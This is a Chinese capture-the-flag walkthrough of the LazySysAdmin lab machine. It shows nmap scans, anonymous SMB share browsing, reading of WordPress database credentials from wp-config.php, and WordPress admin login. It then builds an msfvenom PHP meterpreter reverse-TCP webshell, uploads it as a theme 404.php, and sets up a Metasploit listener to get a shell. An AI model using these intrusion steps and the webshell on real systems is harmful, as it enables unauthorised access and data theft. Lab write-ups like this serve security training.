ctf—夺旗赛smb信息泄露

**

一、协议介绍

**
ctf—夺旗赛smb信息泄露_第1张图片
**

二、信息探测

**
扫描开放服务:

root@kali:~# nmap -sV 192.168.1.109

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-10 10:39 CST
Nmap scan report for 192.168.1.109
Host is up (0.0024s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)   //开启了smb服务
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 00:0C:29:93:46:FE (VMware)
Service Info: Host: Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.29 seconds

root@kali:~# nmap -A -v -T4 192.168.1.109    //-A 所有信息 -v  -T4 最大线程

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-10 10:44 CST
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:44
Completed NSE at 10:44, 0.00s elapsed
Initiating NSE at 10:44
Completed NSE at 10:44, 0.00s elapsed
Initiating ARP Ping Scan at 10:44
Scanning 192.168.1.109 [1 port]
Completed ARP Ping Scan at 10:44, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:44
Completed Parallel DNS resolution of 1 host. at 10:44, 0.01s elapsed
Initiating SYN Stealth Scan at 10:44
Scanning 192.168.1.109 [1000 ports]
Discovered open port 139/tcp on 192.168.1.109
Discovered open port 22/tcp on 192.168.1.109
Discovered open port 445/tcp on 192.168.1.109
Discovered open port 3306/tcp on 192.168.1.109
Discovered open port 80/tcp on 192.168.1.109
Discovered open port 6667/tcp on 192.168.1.109
Completed SYN Stealth Scan at 10:44, 0.09s elapsed (1000 total ports)
Initiating Service scan at 10:44
Scanning 6 services on 192.168.1.109
Completed Service scan at 10:44, 11.02s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.109
NSE: Script scanning 192.168.1.109.
Initiating NSE at 10:44
Completed NSE at 10:44, 9.71s elapsed
Initiating NSE at 10:44
Completed NSE at 10:44, 0.00s elapsed
Nmap scan report for 192.168.1.109
Host is up (0.00040s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|_  256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.1.108
|_  error: Closing link: ([email protected]) [Client exited]
MAC Address: 00:0C:29:93:46:FE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.002 days (since Wed Jul 10 10:42:13 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC:  (unknown)
| Names:
|   LAZYSYSADMIN<00>     Flags: 
|   LAZYSYSADMIN<03>     Flags: 
|   LAZYSYSADMIN<20>     Flags: 
|   WORKGROUP<00>        Flags: 
|_  WORKGROUP<1e>        Flags: 
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN
|   Domain name: 
|   FQDN: lazysysadmin
|_  System time: 2019-07-10T12:44:25+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.40 ms 192.168.1.109

NSE: Script Post-scanning.
Initiating NSE at 10:44
Completed NSE at 10:44, 0.00s elapsed
Initiating NSE at 10:44
Completed NSE at 10:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.28 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.302KB)

查看靶场机器上的共享的文件夹和文件:

root@kali:~# smbclient -L 192.168.1.109          //
WARNING: The "syslog" option is deprecated
Enter root's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers                                      //可以看到smb服务上的文件
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)             //IPC表示空连接,相当于不需要密码账号就可以
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

	Server               Comment
	---------            -------
	LAZYSYSADMIN         Web server

	Workgroup            Master
	---------            -------
	WORKGROUP            

继续探测文件夹:

root@kali:~# smbclient '\\192.168.1.109\print$'   //‘\\IP\文件名字’  注意要用单引号。
WARNING: The "syslog" option is deprecated
Enter root's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
tree connect failed: NT_STATUS_ACCESS_DENIED
我们可以看到没有权限登陆



root@kali:~# smbclient '\\192.168.1.109\share$'
WARNING: The "syslog" option is deprecated
Enter root's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Aug 15 19:05:52 2017
  ..                                  D        0  Mon Aug 14 20:34:47 2017
  wordpress                           D        0  Tue Aug 15 19:21:08 2017
  Backnode_files                      D        0  Mon Aug 14 20:08:26 2017
  wp                                  D        0  Tue Aug 15 18:51:23 2017
  deets.txt                           N      139  Mon Aug 14 20:20:05 2017
  robots.txt                          N       92  Mon Aug 14 20:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 20:39:56 2017
  apache                              D        0  Mon Aug 14 20:35:19 2017
  index.html                          N    36072  Sun Aug  6 13:02:15 2017
  info.php                            N       20  Tue Aug 15 18:55:19 2017
  test                                D        0  Mon Aug 14 20:35:10 2017
  old                                 D        0  Mon Aug 14 20:35:13 2017

		3029776 blocks of size 1024. 1456520 blocks available
smb: \> exit
root@kali:~# smbclient '\\192.168.1.109\IPc$'
WARNING: The "syslog" option is deprecated
Enter root's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*    //没有权限查看IPc文件
smb: \> pwd
Current directory is \\192.168.1.109\IPc$\
smb: \> 

查看share文件:

root@kali:~# smbclient '\\192.168.1.109\share$'
WARNING: The "syslog" option is deprecated
Enter root's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Aug 15 19:05:52 2017
  ..                                  D        0  Mon Aug 14 20:34:47 2017
  wordpress                           D        0  Tue Aug 15 19:21:08 2017     //wordpass是一个目录
  Backnode_files                      D        0  Mon Aug 14 20:08:26 2017  
  wp                                  D        0  Tue Aug 15 18:51:23 2017
  deets.txt                           N      139  Mon Aug 14 20:20:05 2017  //deet.txt 是一个文件
  robots.txt                          N       92  Mon Aug 14 20:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 20:39:56 2017
  apache                              D        0  Mon Aug 14 20:35:19 2017
  index.html                          N    36072  Sun Aug  6 13:02:15 2017
  info.php                            N       20  Tue Aug 15 18:55:19 2017
  test                                D        0  Mon Aug 14 20:35:10 2017
  old                                 D        0  Mon Aug 14 20:35:13 2017

		3029776 blocks of size 1024. 1456520 blocks available
smb: \> get deets.txt       //下载文件,我们打开另一个终端查看文件看到password
getting file \deets.txt of size 139 as deets.txt (67.9 KiloBytes/sec) (average 67.9 KiloBytes/sec)
smb: \> cd wordpress\
smb: \wordpress\> ls
  .                                   D        0  Tue Aug 15 19:21:08 2017
  ..                                  D        0  Tue Aug 15 19:05:52 2017
  wp-config-sample.php                N     2853  Wed Dec 16 17:58:26 2015
  wp-trackback.php                    N     4513  Sat Oct 15 03:39:28 2016
  wp-admin                            D        0  Thu Aug  3 05:02:02 2017
  wp-settings.php                     N    16200  Fri Apr  7 02:01:42 2017
  wp-blog-header.php                  N      364  Sat Dec 19 19:20:28 2015
  index.php                           N      418  Wed Sep 25 08:18:11 2013
  wp-cron.php                         N     3286  Mon May 25 01:26:25 2015
  wp-links-opml.php                   N     2422  Mon Nov 21 10:46:30 2016
  readme.html                         N     7413  Mon Dec 12 16:01:39 2016
  wp-signup.php                       N    29924  Tue Jan 24 19:08:42 2017
  wp-content                          D        0  Mon Aug 21 18:07:27 2017
  license.txt                         N    19935  Tue Jan  3 01:58:42 2017
  wp-mail.php                         N     8048  Wed Jan 11 13:13:43 2017
  wp-activate.php                     N     5447  Wed Sep 28 05:36:28 2016
  .htaccess                           H       35  Tue Aug 15 19:40:13 2017
  xmlrpc.php                          N     3065  Thu Sep  1 00:31:29 2016
  wp-login.php                        N    34327  Sat May 13 01:12:46 2017
  wp-load.php                         N     3301  Tue Oct 25 11:15:30 2016
  wp-comments-post.php                N     1627  Mon Aug 29 20:00:32 2016
  wp-config.php                       N     3703  Mon Aug 21 17:25:14 2017    //可以看到wordpass的配置文件
  wp-includes                         D        0  Thu Aug  3 05:02:03 2017

		3029776 blocks of size 1024. 1456520 blocks available
smb: \wordpress\> get wp-config.php    //下载终端文件
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (723.2 KiloBytes/sec) (average 536.0 KiloBytes/sec)

我们查看终端文件:

root@kali:~# cat wp-config.php 
g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY',  'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY',    'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY',        ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT',        '(:^?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT',   '=M_DRp%vGmijIhl%K!(v>:,*RRG:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');

;

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');


/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

我们可以看到数据库对应的用户名和密码:
ctf—夺旗赛smb信息泄露_第2张图片
TogieMYSQL12345^^

接着我们打开数据库(在namp扫描结果中的我们可以看到开放了对应的端口):

root@kali:~# mysql -h 192.168.1.109  -u admin -p
Enter password: 
ERROR 1130 (HY000): Host '192.168.1.108' is not allowed to connect to this MySQL server

结果很遗憾我们并没有登陆进去,这时候我们发现服务器开放了对应的ssh,我们尝试以下登陆ssh:
结果登陆失败了。

此时我们针对SMB协议远程溢出漏洞进行分析:
searchsploit samba 版本号查看是否具有远程溢出漏洞

root@kali:~# searchsploit Samba  Samba smbd 3.X - 4.X
----------------------------------------------- ----------------------------------
 Exploit Title                                 |  Path
                                               | (/usr/share/exploitdb/platforms)
----------------------------------------------- ----------------------------------

----------------------------------------------- ----------------------------------
root@kali:~# searchsploit Samba  Samba 4.3.11-Ubuntu
----------------------------------------------- ----------------------------------
 Exploit Title                                 |  Path
                                               | (/usr/share/exploitdb/platforms)
----------------------------------------------- ----------------------------------

----------------------------------------------- ----------------------------------
root@kali:~# 

我们看到都没有远程溢出漏洞

mysql ssh 都没有发现什么,这时候我们寻找其他的出口,比如80端口的http协议:
首先进行目录文件探测:

root@kali:~# dirb http://192.168.1.109/

在探测的过程中我们发现有一个phpadmin目录,输入我们上面找到的账户、密码我们登陆,竟然登陆进去了。
ctf—夺旗赛smb信息泄露_第3张图片

但是我们进去之后,查看各种数据库、各种表依旧没有发现什么有用的信息,因为我们在看一下别的目录:

http://192.168.1.109/wordpress/wp-admin  我们打开这个目录,输入密码账户

ctf—夺旗赛smb信息泄露_第4张图片我们登陆进网站后台之后,我们就可以上传一句话木马,拿到权限。
**

三、上传一句话木马

**

webshell的制作:

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444  -f raw

可以看到返回的源代码:
ctf—夺旗赛smb信息泄露_第5张图片

root@kali:~# gedit webshell.php  //制作php脚本

打开metasploit,设置监听:

root@kali:~# msfconsole 
[-] Failed to connect to the database: could not connect to server: Connection refused
	Is the server running on host "localhost" (::1) and accepting
	TCP/IP connections on port 5432?
could not connect to server: Connection refused
	Is the server running on host "localhost" (127.0.0.1) and accepting
	TCP/IP connections on port 5432?

                                                  

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler                    //使用模块
msf exploit(handler) > set payload php/meterpreter/reverse_tcp 
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options   //设置参数

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set lhost  192.168.1.109
lhost => 192.168.1.109
msf exploit(handler) > set lport  4444
lport => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.109    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run    //开始运行监听 

[-] Handler failed to bind to 192.168.1.109:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Starting the payload handler...

以上步骤就是打开Meterpreter模板,设置payload,来监听端口(此时我们已经将反弹shell的脚本上传至对应位置,只需执行反弹shell脚本)。

上传webshell:
ctf—夺旗赛smb信息泄露_第6张图片
ctf—夺旗赛smb信息泄露_第7张图片
我们在网址中打开webshell地址,这里要注意对应的url名:

http://192.168.1.109/wordpress/wp-content/themes/twentyfifteen/404.php

进入命令行模式:

python -c "import pty;pty.spawn('/bin/bash')"      //优化终端记住  /bin/bash要用单引号   

补充:
1.Linux /etc/passwd内容解释
2.sudo --l 命令的意思是: -l 列出目前用户可执行与无法执行的指令。
3.在metasploit模块下进入反弹的shell用shell命令。
4.切换到普通用户:su togie (su 用户名称)此时输入所切换到的用户的密码即togie
5.关于su、sudo、sudo -i的区别
6.sudo su 用来提升命令权限,可以直接进入到root命令。
7.use exploit/multi/handler
8.set payload php/meterpreter/reverse_tcp
9.msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
10.关于8、9这两个东西的解释(暂且叫着两个东西)
11.nmap -A -v -T4 192.168.1.109 利用多线程(T4),扫描全部(A)详细(v)信息
12.nmap -sV 192.168.1.109 -sV 探测端口的服务类型/具体版本等信息
13.smbclient -L 192.168.1.109 -L:显示服务器端所分享出来的所有资源。smbclient命令属于samba套件,它提供一种命令行使用交互式方式访问samba服务器的共享资源。具体参数
14.smbclient '\\192.168.1.109\print$' //‘\IP\文件名字’ 注意要用单引号。
15.get deets.txt 在smb中下载文件。

你可能感兴趣的:(Linux基础)